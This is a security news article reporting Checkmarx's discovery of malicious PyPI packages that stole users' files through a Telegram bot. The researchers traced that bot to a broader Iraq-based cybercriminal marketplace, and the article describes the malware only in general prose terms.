Well-Established Cybercriminal Ecosystem Blooming in Iraq

A sprawling criminal network has emerged in Iraq, linked to a Telegram bot that dates back to 2022 and contains more than 90,000 messages, mostly in Arabic.

According to researchers at Checkmarx, the bot is the key to a larger, sophisticated cybercriminal ecosystem, including a thriving underground marketplace offering social media manipulation services and financial theft tools, and a suite of malicious PyPI packages that exfiltrate user data.

Malicious PyPI Packages for Data Theft

A series of malicious, Arabic-language Python packages recently surfaced on the Python code repository PyPI according to Checkmarx, uploaded by a user named "dsfsdfds." Upon further examination, the researchers found them to contain a malicious script that was pilfering sensitive user data out to a Telegram bot chat.

"The malicious script … begins by scanning the user's file system, focusing on two specific locations: the root folder and the DCIM folder," according to the report, released today. "During this scanning process, the script searches for files with extensions such as .py, .php, and .zip files, as well as photos with .png, .jpg, and .jpeg extensions."

The packages also contained a hardcoded Telegram ID and token, which Checkmarx researchers used to gain direct access to the attacker's Telegram bot, where they discovered "a significant history of activity, with records dating back to at least 2022, long before the malicious packages were released on PyPI."

Ultimately, the 90,000 messages pointed to an origin in Iraq, with ties with many other bots to boot. In all, it's clear that Iraq is home to a heretofore unknown, thriving cybercriminal enterprise with a raft of illicit services on offer.

"The discovery of the malicious Python packages on PyPI and the subsequent investigation into the Telegram bot have shed light on a sophisticated and widespread cybercriminal operation," the report concluded. "What initially appeared to be an isolated incident of malicious packages turned out to be just the tip of the iceberg, revealing a well-established criminal ecosystem based in Iraq."

The discovery underscores the role that open source software continues to play when it comes to providing an attack vector for compromising enterprise information, the researchers noted, adding that they plan to release further details on the Iraq underground discovery in the coming months.

"As the fight against malicious actors in the open-source ecosystem persists, collaboration and information sharing among the security community will be critical in identifying and thwarting these attacks," they said. "Through collective effort and proactive measures, we can work towards a safer and more secure open-source ecosystem for all."